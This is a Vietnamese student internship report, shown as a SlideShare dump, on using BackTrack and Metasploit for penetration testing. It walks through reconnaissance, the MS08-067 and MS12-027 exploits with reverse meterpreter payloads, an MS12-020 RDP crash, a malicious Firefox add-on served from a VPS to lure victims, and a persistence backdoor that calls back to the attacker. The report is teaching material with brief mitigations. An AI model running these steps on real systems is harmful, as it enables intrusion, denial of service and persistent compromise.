SlideShare a Scribd company logo
1 of 33
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | i SVTH: Nguyễn Văn Tiến
TRÍCH YẾU
Hiện nay trong thời đại công nghệ thông tin vấn đề an toàn và bảo mật
thông tin của mọi cá nhân, doanh nghiệp, cơ quan, tổ chức … được quan tâm
hàng đầu. Do việc nhu cầu trao đổi thông tin giữa các cá nhân, tổ chức … ngày
càng cao vì vậy vấn đề bảo mật là rất cần thiết. Nếu an ninh mạng không được
quan tâm đúng mức sẽ có nhiều vấn đề nghiêm trọng xảy ra như xâm nhập bất
hợp pháp, đánh cấp dữ liệu, tấn công, lừa đảo… Một trong những cách để hạn
chế những vấn đề đó là luôn kiểm tra hệ thống, cài đặt phần mềm có license, cài
đặt các bản vá…
Trong thời gian thực tập 8 tuần từ ngày 12/05/2014 đến ngày 05/07/2014
tôi đã hoàn thành đồ án “ Nghiên cứu và sử dụng Backtrack để kiểm tra an ninh
mạng”. Quá trình thực tập giúp tôi hiểu được về công việc của những người
kiểm tra hệ thống mạng và tôi có thể vận dụng những kiến thức đã được học vào
thực tế. Bên cạnh đó, tôi học hỏi được nhiều thứ trong cuộc sống từ các bạn thực
tập chung và đặt biệt biệt là thầy Võ Đỗ Thắng.
Tôi cam kết kết quả của đồ án là do tôi thực hiện dưới sự hướng dẫn của
thầy Võ Đỗ Thắng(Giám đốc Trung tâm đào tạo Quản trị mạng và an ninh mạng
Quốc tế Athena) không sao chép của người khác. Các bước của quá trình thực
hiện được ghi lại bằng những đoạn phim ngắn và có thuyết minh.
Danh sách các đoạn phim:
Cài đặt Backtrack 5R3
https://www.youtube.com/watch?v=etNV0jf7sFk
Các công cụ thu thập thông tin:
https://www.youtube.com/watch?v=CePaGIHRhog
Khai thác lổ hỏng MS08_067:
https://www.youtube.com/watch?v=t0t8A0OPtoU
Khai thác lổ hỏng MS12_020:
https://www.youtube.com/watch?v=ZArVYCUj9BU
Khai thác lổ hỏng MS12_027:
https://www.youtube.com/watch?v=yLHvLe-olOM
Cài Metasploit trên VPS:
https://www.youtube.com/watch?v=YMqkg3duLQ8
Khai thác lỗ hỏng của firefox_xpi_bootstrapped qua mạng internet có sử
dụng backdoor:
https://www.youtube.com/watch?v=4oNY9pUmeb0
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | ii SVTH: Nguyễn Văn Tiến
MỤC LỤC
Chương Mở Đầu: GIỚI THIỆU VỀ BACKTRACK.........................................1
I. Giới thiệu .................................................................................................1
II. Cài đặt......................................................................................................1
Chương 1: THU THẬP THÔNG TIN VÀ KHAI THÁC LỖ HỎNG CỦA HỆ
ĐIỀU HÀNH WINDOWS TRONG MẠNG LAN.........................................................4
I. Giới thiệu .................................................................................................4
II. Thu thập thông tin....................................................................................5
1. Liệt kê dịch vụ......................................................................................5
2. Xác định phạm vi mạng........................................................................5
3. Xác định host có đang mở hay không ..................................................6
4. Các dịch vụ...........................................................................................6
5. Xác đinh hệ điều hành..........................................................................6
6. Nhận diện các dịch vụ ..........................................................................7
7. Đánh giá các mối đe dọa ......................................................................7
III. Khai thác lỗ hỏng qua mạng Lan.............................................................8
1. Khai thác lỗ hỏng MS08_067...............................................................8
2. Khai thác lỗ hỏng MS12_020.............................................................11
3. Khai thác lỗ hỏng MS12_027.............................................................13
Chương 2: XÂY DỰNG HONEYPOT ĐỂ XÂM NHẬP QUA MẠNG
INTERNET 17
I. Giới thiệu về Honeypot..........................................................................17
II. Xâm nhập qua mạng internet bằng Honeypot .......................................17
1. Cài đặt Metasploit trên VPS...............................................................17
2. Khai thác qua mạng internet...............................................................21
3. Backdoor.............................................................................................23
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | iii SVTH: Nguyễn Văn Tiến
Lời Cảm Ơn
Khoa Công Nghệ Thông Tin và Truyền Thông
Trường Đại học Cần Thơ
Em xin chân thành cảm ơn Khoa Công nghệ thông tin và Truyền thông trường Đại học
Cần Thơ đã tạo điều kiện cho em hoàn thành tốt đợt thực tập thực tế này. Trong đợt
thực tập này đã giúp em có nhiều kinh nghiệm thực tế trong học tập và cuộc sống.
Những kinh nghiệm đó sẽ giúp em hiểu rõ và định hướng cho công việc sau này.
Bên cạnh đó, em xin cảm ơn các Thầy Cô khoa CNTT&TT đã tận tình giảng dạy và
trang bị cho em những kiến thức cần thiết và hỗ trợ cho em hoàn thành đề tài này.
Trong quá trình thực tập thực tế đã hoàn thành nhưng không tránh khỏi những phần sai
sót. Vì vậy, em rất mong nhận được ý kiến chân thành của quý Thầy Cô để em hoàn
thiện hơn trong công việc và cuộc sống.
Em xin chân thành cảm ơn!
Tp Hồ Chí Minh, ngày 07 tháng 07 năm 2014
Sinh viên thực tập
Nguyễn Văn Tiến
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | iv SVTH: Nguyễn Văn Tiến
Lời Cảm ơn
Trung Tâm Đào Tạo Quản Trị Mạng và
An Ninh Mạng Quốc tế ATHENA
Em xin chân thành cảm ơn Trung tâm đào tạo Quản trị mạng và An ninh mạng Quốc
tế Athena đã tạo điều kiện cho em thực tập thực tế nơi đây. Em đã nhận được sự hỗ trợ
nhiệt tình về cơ sở vật chất cũng như chuyên môn.
Em xin bày tỏ lòng biết ơn đến quý Thầy Cô của trung tâm,đặt biệt là thầy Võ Đỗ
Thắng đã chỉ dạy tận tình giúp em hoàn thành đề tài này.
Trong quá trình thực tập thực tế đã hoàn thành nhưng không tránh khỏi những phần sai
sót. Vì vậy, em rất mong nhận được ý kiến chân thành của quý Thầy Cô để em hoàn
thiện hơn trong công việc và cuộc sống.
Em xin chân thành cảm ơn!
Tp Hồ Chí Minh, ngày 07 tháng 07 năm 2014
Sinh viên thực tập
Nguyễn Văn Tiến
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | v SVTH: Nguyễn Văn Tiến
Giáo viên hướng dẫn thầy Võ Đỗ Thắng(phải) và sinh viên thực tập Nguyễn Văn Tiến
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | vi SVTH: Nguyễn Văn Tiến
NHẬN XÉT CỦA GIÁO VIÊN
---------oo0oo---------
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
.................................................................................................................................
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | vii SVTH: Nguyễn Văn Tiến
GIỚI THIỆU TRUNG TÂM ATHENA
1. Giới thiệu
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc
Tế ATHENA được thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt
Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết
góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế
mũi nhọn, góp phần phát triển nước nhà .
2. Lĩnh vực hoạt động
Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên
sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của
các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó,
trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn
đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp,
các cơ quan chính phủ, tổ chức tài chính…
Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là
chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ
ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin
Truyền Thông các tỉnh, bưu điện các tỉnh,…
Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình
hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành
Phố Hồ CHính Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính
Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,...
3. Đội ngũ giảng viên
Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại
học hàng đầu trong nước .... Tất cả giảng viên ATHENA đều phải có các chứng chỉ
quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm Quốc tế
(Microsoft Certified Trainer). Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều
kiện tham gia giảng dạy tại trung tâm ATHENA.
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | viii SVTH: Nguyễn Văn Tiến
Bên cạnh đó, các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến
thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và
truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm
ATHENA.
4. Cơ sở vật chất
Thiết bị đầy đủ và hiện đại.
Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công
nghệ mới nhất.
Phòng máy rộng rãi, thoáng mát.
5. Dịch vụ
Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn.
Giới thiệu việc làm cho mọi học viên.
Thực tập có lương cho học viên khá giỏi.
Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới
hạn thời gian.
Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính,
mạng máy tính, bảo mật mạng.
Hỗ trợ thi Chứng chỉ Quốc tế.
6. Liên hệ
Cơ sở 1: 92 Nguyễn Đình Chiểu, phường Đa Kao, Quận 1. Điện thoại: 090 78
79 477 - 094 323 00 99 - (08)38244041.
Cơ sở 2: 2 Bis Đinh Tiên Hoàng, phường Đa Kao, Quận 1. Điện thoại: 094 320
00 88 - (08)22 10 38 01.
Website: http://athena.edu.vn - http://athena.com.vn
E-mail : support@athena.edu.vn - tuvan@athena.edu.vn
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 1 SVTH: Nguyễn Văn Tiến
Chương Mở Đầu: GIỚI THIỆU VỀ BACKTRACK
I. Giới thiệu
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để
thử nghiệm thâm nhập. Trong các định dạng Live DVD, bạn sử dụng có thể Backtrack
trực tiếp từ đĩa DVD mà không cần cài nó vào máy của bạn. Backtrack cũng có thể
được cài đặt vào ổ cứng và sử dụng như một hệ điều hành. Backtrack là sự hợp nhất
giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm -IWHAX,
WHOPPIX, và Auditor. Trong phiên bản hiện là Backtrack 5R3 được phát hành vào
tháng 8 năm 2012 bổ sung hơn 60 công cụ mới. Một số thay đổi đáng chú ý bao gồm
các công cụ thử nghiệm xâm nhập điện thoại di động, giao diện đồ họa cho công cụ
crack- wifi, một thể loại hoàn toàn mới là công cụ khai thác vật lý.
II. Cài đặt
Nếu chúng ta muốn sử dụng Backtrack mà không cần cài nó vào ổ cứng hay
Live DVD, chúng ta có thể ghi tập tin ảnh ISO vào đĩa DVD và khởi động máy tính
của bạn với DVD. Backtrack sau đó sẽ chạy từ đĩa DVD. Lợi thế của việc sử dụng
Backtrack là một DVD Live là nó là rất dễ dàng. Tuy nhiên, phương pháp này cũng có
một số nhược điểm. Backtrack có thể không làm việc với phần cứng và thay đổi cấu
hình nào được thực hiện trên phần cứng để làm việc sẽ không được lưu với đĩa DVD
Live. Ngoài ra, nó là chậm vì máy tính cần phải tải các chương trình từ đĩa DVD.
Cài đặt trong máy ảo. Điểm thuận lợi là chúng ta có thể dễ dàng sử dụng
Backtrack với hệ điều hành hiện tại. Khuyết điểm là tốc độ chậm, không dùng được
wireless trừ USB wireless.
Ở đây tôi cài Backtrack 5R3 trên máy ảo VMWare. Sau đây là một số hình ảnh khi cài
đặt Backtrack 5R3
Tạo máy ảo Backtrack
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 2 SVTH: Nguyễn Văn Tiến
Đặt tên và chọn nơi lưu máy ảo.
Sau đó chúng ta hoàn thành các tùy chọn của máy ảo, tiếp theo chúng ta sẽ mở máy ảo lên.
Chọn chế độ boot “text mode” và đăng nhập vào Backtrack với username :root và password là toor. Gõ
“startx” để vào giao diện đồ họa .Sau đó chúng ta nhấn vào Install trên màn hình để cài đặt.
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 3 SVTH: Nguyễn Văn Tiến
Sauk hi điền các thông tin về ngôn ngữ, múi giờ, bàn phím, phân vùng ổ cứng thì sau đó ta bấm vào nút
install để cài đặt
Giao diện của BackTrack sau khi cài đặt hoàn thành trên VMWare
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 4 SVTH: Nguyễn Văn Tiến
Chương 1: THU THẬP THÔNG TIN VÀ KHAI THÁC LỖ HỎNG
CỦA HỆ ĐIỀU HÀNH WINDOWS TRONG MẠNG LAN
I. Giới thiệu
Đầu tiên hacker tiến hành thu thập thông tin về hạ tầng của mục tiêu, mô hình
của các Web Server, kiểu giao tiếp thông tin thông qua các cổng (port) nào, những site
liên quan đến việc thực hiện chức năng của site mục tiêu... Việc thu thập thông tin là
vấn đề quan trọng cho việc tấn công vào một hệ thống máy mục tiêu. Cho dù hacker
tấn công theo phương diện phần cứng hay qua ứng dụng thì việc thu thập vẫn là cần
thiết.
FootPrinting (In dấu ấn - thu thập thông tin): Là bước mà kẻ tấn công thâu tóm
càng nhiều thông tin càng tốt về đối tượng, người dùng, doanh nghiệp, các chi nhánh
của công ty, máy chủ… bao gồm các chi tiết: Domain Name, Địa chỉ IP, Networking
Prototcols…Đây là một bước quan trọng: Cho hacker nhiều thông tin, đôi khi với
những thông tin này hacker đã có thể làm chủ hệ thống. Sử dụng công cụ Nslookup,
SmartWhois…
Sanning (Quét thăm dò mạng): là quá trình tìm hiểu thông tin về các live host
trên mạng để giúp hacker quyết định kiểu tấn công nào vào hệ thống. Trong quá trình
Scanning hacker sẽ tìm hiểu thông tin về: địa chỉ IP, cổng, hệ điều hành, network, …
Enumeration (Điểm danh mạng - liệt kê tìm lỗ hổng): Đến đây, các hacker bắt
đầu kiểm soát server sơ bộ. Bước này là quá trình tập hợp và phân tích tên người dùng,
tên máy,tài nguyên chia sẽ và các dịch vụ. Sau đó tìm kiếm những tài nguyên được
bảo vệ kém, hoặc tài khoản người dùng mà có thể sử dụng để xâm nhập, bao gồm các
mật khẩu mặc định, các script và dịch vụ mặc định.
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 5 SVTH: Nguyễn Văn Tiến
II. Thu thập thông tin
1. Liệt kê dịch vụ
Là tiến trình thu thập thông tin từ mạng, cho phép thu thập thông tin về tổ chức
như tên người dùng, tên máy tính, địa chỉ IP, mail server…
2. Xác định phạm vi mạng
Xác định phạm vi các địa chỉ IP từ mạng của mục tiêu
Sử dụng Dmitry để lấy thông tin từ mục tiêu, sử dụng –wnsp để tra cứu lấy tên
miền và quét cổng.
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 6 SVTH: Nguyễn Văn Tiến
Sử dụng “scapy” để xác định traceroute.
Scapy : mở scapy
res,unans=traceroute(["www.athena.edu.vn"],dport=[80,443],maxttl=20): xác
định đường đi của gói tin đến Athena.edu.vn với port là 80 và 443, maxttl là 20.
res.graph() :hiển thị đường đi gói tin
3. Xác định host có đang mở hay không
Chúng ta có thể sử dụng lệnh ping đến mục tiêu.
Nmap –sP [ip đích] : -sP giúp xâm nhập mạng mục tiêu nhanh chóng, giúp cho
chúng ta biết host đó có up hay không. Tùy chọn sP sẽ gửi gói tin ICMP echo request
và 1 gói tin TCP ACK tới cổng 80.
4. Các dịch vụ
Để xem các dịch vụ nào đang mở trên đối tượng ta sử dụng
Nmap [địa chỉ ip đích]
Hay Nmap –p 1-1000 [địa chỉ ip đích] tìm port từ 1 đến 1000 có port nào đang
mở hay không.
Chúng ta cũng có thể scan 1 port nào đó nmap –p 80 [địa chỉ ip]
5. Xác đinh hệ điều hành
Chúng ta đã biết được địa chỉ IP , máy hoạt động, xác định được các cổng mở
của mục tiêu, bước tiếp theo là chúng ta xác định hệ điều hành nào đang chạy để cung
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 7 SVTH: Nguyễn Văn Tiến
cấp cho quá trình khac thác lỗ hổng.
Nmap –O [địa chỉ IP]
6. Nhận diện các dịch vụ
Xác định các dịch vụ dựa trên các cổng đã nhận diện
7. Đánh giá các mối đe dọa
Backtrack sử dụng công cụ Metalgo, cung cấp thông tin tổng hợp từ bên trong
lẫn bên ngoài để có thông tin rõ ràng về mối de doa.
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 8 SVTH: Nguyễn Văn Tiến
III. Khai thác lỗ hỏng qua mạng Lan
Đặc điểm chung của một hệ thống mạng là có nhiều người sử dụng chung
và phân tán về mặt địa lý nên việc bảo vệ tài nguyên (mất mát hoặc sử dụng không
hợp lệ) phức tạp hơn nhiều so với việc môi trường một máy tính đơn lẻ, hoặc một
người sử dụng. Hoạt động của người quản trị hệ thống mạng phải đảm bảo các thông
tin trên mạng là tin cậy và sử dụng đúng mục đích, đối tượng đồng thời đảm bảo mạng
hoạt động ổn định không bị tấn công bởi những kẻ phá hoại. Nhưng trên thực tế là
không một mạng nào đảm bảo là an toàn tuyệt đối, một hệ thống dù được bảo vệ chắc
chắn đến mức nào thì cũng có lúc bị vô hiệu hóa bởi những kẻ có ý đồ xấu.
1. Khai thác lỗ hỏng MS08_067
Khai thác trực tiếp lên dịch vụ, đây là dịch vụ chia sẽ file trên Windows được
mở mặc định(port 445), attacker có thể làm tràn bộ đệm và thực thi một mã lệnh từ xa.
Các hê điều hành bị ảnh hưởng : Windows 2000 sp4, Windows 2000 SP4, XP
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 9 SVTH: Nguyễn Văn Tiến
SP2 và SP3, Server 2003 SP1 và SP2, Vista SP1…
Các bước thực hiện khai thác:
Chúng ta mở msfconsole lên.
Tiếp theo là chúng ta gõ: use exploit/windows/smb/ms08_067_netapi
Chúng ta show options để sem các tùy chọn của nó. Tiếp đó chúng ta set
RHOST (địa chỉ IP của máy nạn nhân) .
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 10 SVTH: Nguyễn Văn Tiến
Chúng ta set payload windows/meterpreter/reverse_rtcp
Chúng ta set LHOST (địa chỉ IP của attacker).
Và show targets để xem các tuy chọn.
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 11 SVTH: Nguyễn Văn Tiến
Chúng ta khai thác máy nạn nhân là winxp Sp3 nên tùy chọn là 5.
Và cuối cung là exploit để khai thác.
Và bây giờ chúng ya có thể xâm nhập vào máy win XP.
Cách phong tránh là tắt các cổng không sử dụng. Cập nhật các bản vá. Cài các
phần mềm có mua bản quyền.
2. Khai thác lỗ hỏng MS12_020
Do gửi các gói tin RDP đến đối tượng đích được khởi tạo không đúng cách
hoặc bị xóa, gây ra tình trạng máy tính bị lỗi màn hình xanh và khởi động lại.
Các hệ điều hành bị ảnh hưởng: Windows XP SP2 and SP3, Windows Server
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 12 SVTH: Nguyễn Văn Tiến
2003 SP2, Windows Vista SP2, Windows Server 2008 …
Quá trình thực hiện:
Sử dụng lệnh: use auxiliary/dos/windows/rdp/ms12_020_maxchanelids
Tiếp theo ta gõ: “show options” để xem các tùy chọn
Chúng ta gõ: “set RHOST [địa chỉ IP máy nạn nhân]”
Cuối cùn là “run” để thưc hiện.
Chúng ta sẽ qua máy Win XP và thấy màn hình xanh
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 13 SVTH: Nguyễn Văn Tiến
Bên máy attacker thì báo hệ thống đã bị đánh sập.
Cách phòng tránh là: cập nhật bản vá lỗi, tắt port 3389, cài chương trình diệt
virus…
3. Khai thác lỗ hỏng MS12_027
Lỗi do định dạng file trên office.
Các phần mềm bị ảnh hưởng :Office 2003 SP3, Office 2007 SP2, Office 2007
SP3, Office 2010 SP1...
Quá trình thực hiện: sử dụng Backtrack 5r3 làm attacker và 1 máy Win XP SP2
có cài Office 2007 làm victim.
Trên Metasploit console chúng ta gõ lệnh :
“use exploit/windows/fileformat/ms12_027_mscomctl_bof”
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 14 SVTH: Nguyễn Văn Tiến
Đặt tên của file word tùy ý với phần mở rộng ”.doc”
Tiếp theo là “set payload windows/meterpreter/reverse_tcp”
Địa chỉ IP của attacker: “set LHOST [IP máy attack] và tiếp theo là exploit để
tao ra fileword có chứa mã độc.
Dùng lệnh cp để chuyển file này ra Desktop cho dễ dang sử dụng.
Ta copy file word đã được tạo vào đường dẫn /var/www/
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 15 SVTH: Nguyễn Văn Tiến
Chúng ta start dich vụ web lên.
Tiếp theo chúng ta tạo ra 1 lắng nge: “ use exploit/multi/handler”
Và “ set payload windows/meterpreter/reverse_tcp”
“set LHOST [IP của attacker]”
Máy nạn nhân truy cập vào đường dẫn chứa file word và tải file đó về
Sauk hi tai về thì mở file đó lên
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 16 SVTH: Nguyễn Văn Tiến
Chúng ta thấy trên máy attack có 1 sessions được tạo ra.
Attacker kết nối vào và thực hiên tấn công.
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 17 SVTH: Nguyễn Văn Tiến
Chương 2: XÂY DỰNG HONEYPOT ĐỂ XÂM NHẬP QUA MẠNG
INTERNET
I. Giới thiệu về Honeypot
Honeypot là một hệ thống tài nguyên thông tin được xây dựng với mục đích giả
dạng đánh lừa những kẻ sử dụng và xâm nhập không hợp pháp, thu hút sự chú ý của
chúng, ngăn không cho chúng tiếp xúc với hệ thống thật. Hệ thống tài nguyên thông
tin có nghĩa là Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào như là
Mail Server, Domain Name Server, Web Server… Honeypot sẽ trực tiếp tương tác với
tin tặc và tìm cách khai thác thông tin về tin tặc như hình thức tấn công, công cụ tấn
công hay cách thức tiến hành thay vì bị tấn công. Với mục tiêu xây dựng Honeypot để
xâm nhập vào lỗ hổng hệ thống máy tính qua Internet, Hacker có thể sử dụng Máy chủ
ảo (VPS) và cài đặt Metasploit để trở thành Honeypot và giả dạng là một Web server
bình thường, từ đó đánh lừa máy nạn nhân khi một máy tính bất kỳ có kết nối Internet
truy cập vào địa chỉ mà hacker cung cấp.
II. Xâm nhập qua mạng internet bằng Honeypot
1. Cài đặt Metasploit trên VPS
Quá trình cài đặt Metasploit trên máy VPS: ở đây tôi sử dụng phiên bản
Metasploit 4.6.1. Yêu cầu đầu tiên là tắt các chương trình diệt virus và tường lửa.
Giao diện Welcome chúng ta chon “Next”
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 18 SVTH: Nguyễn Văn Tiến
License Agreement chọn “ I accept the agreement” chọn “Next”
Tạo ra 1 thư mục metasploit trên ổ C:, chọn Next
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 19 SVTH: Nguyễn Văn Tiến
Ở đây Metasploit sử SSL port là 3790
Tạo ra 1 Webserver với server name “localhost” và ngày hết hạn 3650, chúng ta
cũng có thể thay đổi ngày hết hạn của nó.
Quá trình cài đặt đang diễn ra
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 20 SVTH: Nguyễn Văn Tiến
Quá trình cài đặt đã hoàn tất.
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 21 SVTH: Nguyễn Văn Tiến
2. Khai thác qua mạng internet
Dựa vào những lỗi trên trình duyệt người tấn công sử dụng phương pháp nào đó
làm cho các nạn nhân truy cập vào đường dẫn có chứa mã độc hay thực thi các mã độc
đó.
Tôi thưc hiện khai thác lỗ hỏng qua trình duyệt firefox dựa trên lỗi add on của
firefox: ta sử dụng máy WinXP có cài firefox(tất cả các phiên bản điều được) và VPS
đã được cài Metasploit (Honeypot):
Trên VPS chúng ta mở msfconsole :
“use exploit/multi/browser/firefox_xpi_bootstrapped_addon”
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 22 SVTH: Nguyễn Văn Tiến
Tiếp theo là chúng ta đặt tên cho addon để nạn nhân tưởng đây là addon của
firefox : “set addonname [tên addon]. Đường dẫn chứa file addon đó “set uripath /” và
sử dụng exploit để bắt đầu lắng nge.
Sau khi exploit thì nó tạo ra 1 đường dẫn.
Nếu nạn nhân sử dụng firefox truy cập vào đường dẫn này và cài add on thì sẽ
có 1 kết nối đến Honeypot.
Có 1 sesions đã được mở.
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 23 SVTH: Nguyễn Văn Tiến
“Sessions –i 1” để kết nối đến máy nạn nhân. Và chúng ta đã chiếm được hệ
thống của nạn nhân.
3. Backdoor
Backdoor là một chương trình được hacker cài vào máy tính nạn nhân có thể
truy cập vào thời gian sau cho dù lần xâm nhập trước đó đã bị phát hiện.
Cách thực hiện: Tạo thêm một dịch vụ mới có tên “rất hệ thống”, gỡ bỏ một
dịch vụ ít sử dụng và cài backdoor với chính tên đó.
Sauk hi chúng ta chiếm được quyền hệ thống và muốn lần sau máy nạn nhân sẽ
tự kết nối đến mà không phải tốn thời gian khai tấn công như thế nữa. Chúng ta sử
dụng backdoor có sẳn trên Metasploit là persistence.
Xem các trợ giúp của backdoor persistence bằng lệnh: “run persistence –h”
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 24 SVTH: Nguyễn Văn Tiến
Tiếp theo ta thực hiện :
“run persistence –A –U -1 10 –p 443 –r [ip của attacker]
Và ta thấy có thêm 1 sessions đã được tạo ra. Ta thoát khỏi sessions.
Khi mỗi lần nạn nhân mở máy lên thì sẽ có 1 sesions mới được tạo ra.
Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng
GVHD: Võ Đỗ Thắng Trang | 25 SVTH: Nguyễn Văn Tiến
Bây giờ ta có thể khai thác trên máy nạn nhân.

More Related Content

Similar to Báo cáo cuối kỳ

Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]Bao cao cuoi ky [fixed]
Bao cao cuoi ky [fixed]TranQuangChien
 
Luong bao cao athena
Luong bao cao athenaLuong bao cao athena
Luong bao cao athenaquocluong
 
Báo cáo thực tập windows server 2008 gia dinh ly huutai
Báo cáo thực tập windows server 2008 gia dinh ly huutaiBáo cáo thực tập windows server 2008 gia dinh ly huutai
Báo cáo thực tập windows server 2008 gia dinh ly huutaiTai Ly
 
Báo cáo cuối kỳ - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...
Báo cáo cuối kỳ  - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...Báo cáo cuối kỳ  - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...
Báo cáo cuối kỳ - đề tài "nghiên cứu cơ chế routing của cisco mô phỏng trên ...Đàm Văn Sáng
 
Báo cáo thực tập athena 1
Báo cáo thực tập athena 1Báo cáo thực tập athena 1
Báo cáo thực tập athena 1Ngan Nguyen
 
Đồ án Xây dựng website nộp đồ án trực tuyến
Đồ án Xây dựng website nộp đồ án trực tuyếnĐồ án Xây dựng website nộp đồ án trực tuyến
Đồ án Xây dựng website nộp đồ án trực tuyếnAubrey Yundt
 
Bao cao thuc tap ck
Bao cao thuc tap ckBao cao thuc tap ck
Bao cao thuc tap ckice_eyes
 
Linux web hosting (Bao cao)
